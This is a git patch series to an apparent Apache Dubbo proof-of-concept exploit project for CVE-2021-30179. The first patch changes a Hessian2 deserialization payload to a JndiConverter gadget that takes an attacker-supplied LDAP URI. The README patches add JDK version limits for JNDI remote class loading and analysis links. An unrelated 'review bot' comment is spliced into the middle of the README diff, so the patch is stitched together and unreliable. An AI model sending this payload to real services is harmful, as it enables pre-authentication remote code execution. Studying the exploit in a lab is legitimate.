From a0f69bb842d1b1f5527bd434cab099e06304fcf3 Mon Sep 17 00:00:00 2001
From: lz2y <55266300+lz2y@users.noreply.github.com>
Date: Wed, 28 Jul 2021 09:59:19 +0800
Subject: [PATCH 1/3] Update CVE202130179.java
---
 src/main/java/top/lz2y/vul/CVE202130179.java | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/src/main/java/top/lz2y/vul/CVE202130179.java b/src/main/java/top/lz2y/vul/CVE202130179.java
index cb902c3..bce3ebe 100644
--- a/src/main/java/top/lz2y/vul/CVE202130179.java
+++ b/src/main/java/top/lz2y/vul/CVE202130179.java
@@ -86,10 +86,8 @@ private static void getRawReturnPayload(Hessian2ObjectOutput out, String ldapUri
 }
 private static void getBeanPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException {
-// JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
-// javaBeanDescriptor.setProperty("asText",ldapUri);
- JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("com.sun.rowset.JdbcRowSetImpl",7);
- javaBeanDescriptor.setProperty("AutoCommit",ldapUri);
+ JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
+ javaBeanDescriptor.setProperty("asText",ldapUri);
 out.writeObject(new Object[]{javaBeanDescriptor});
 HashMap map = new HashMap();
From 7838ec3cbdcc85ee19b57ddaec2494aaa7fc8d03 Mon Sep 17 00:00:00 2001
From: lz2y <55266300+lz2y@users.noreply.github.com>
Date: Wed, 28 Jul 2021 11:18:42 +0800
Subject: [PATCH 2/3] Update README.md
---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/README.md b/README.md
index 7369758..3baefbf 100644
--- a/README.md
+++ b/README.md
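Review bot: In the `getBeanPayload` hunk of CVE202130179.java, the added constructor call passes a bare `7` as the descriptor type; assuming this is Dubbo's `JavaBeanDescriptor`, the named constant states the intent: `new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter", JavaBeanDescriptor.TYPE_BEAN);`. The commit also swaps the class/property pair and deletes the earlier alternative with no explanation beyond the subject line, so a one-line comment above the descriptor would record the assumption for anyone reproducing the advisory in a lab or scoping which providers are affected, e.g. `// needs the class named here on the test provider's classpath; replaces the JdbcRowSetImpl/AutoCommit variant`. The body of `getBeanPayload` continues past the end of the hunk, so this covers only the two added lines.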
@@ -10,6 +10,11 @@ Apache Dubbo 漏洞POC
 - [ ] others
 * 免责声明
 * 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
+* 注意事项
+ * 需要用到JNDI注入的POC请于低版本的JDK版本测试(项目在8u71中测试)
+ > * 基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码
+ > * 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载
+ > * From:https://www.freebuf.com/vuls/279465.html
 * 参考链接
From 89a3a723be68e1f7da38708744bc0e73758b9fe3 Mon Sep 17 00:00:00 2001
From: lz2y <55266300+lz2y@users.noreply.github.com>
Date: Thu, 28 Oct 2021 22:34:07 +0800
Subject: [PATCH 3/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=20=E5=88=86=E6=9E=90?= =?UTF-8?q?=E6=96=87=E7=AB=A0=E9=93=BE=E6=8E=A5?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 3baefbf..7720122 100644
--- a/README.md
+++ b/README.md
@@ -20,3 +20,5 @@ Apache Dubbo 漏洞POC
 * [GHSL-2021-034_043: Multiple pre-auth RCEs in Apache Dubbo](https://securitylab.github.com/advisories/GHSL-2021-034_043-apache-dubbo/)
 * [dubbo源码浅析:默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658)
+* 分析文章
+ * https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg